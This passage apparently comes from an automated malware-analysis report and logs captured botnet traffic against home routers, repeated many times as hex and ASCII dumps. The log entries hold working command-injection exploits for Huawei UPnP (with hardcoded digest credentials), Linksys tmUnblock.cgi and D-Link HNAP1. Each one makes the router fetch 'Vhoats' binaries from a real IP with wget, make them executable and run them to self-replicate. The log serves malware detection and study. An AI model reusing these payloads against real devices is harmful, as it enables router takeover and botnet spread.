2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 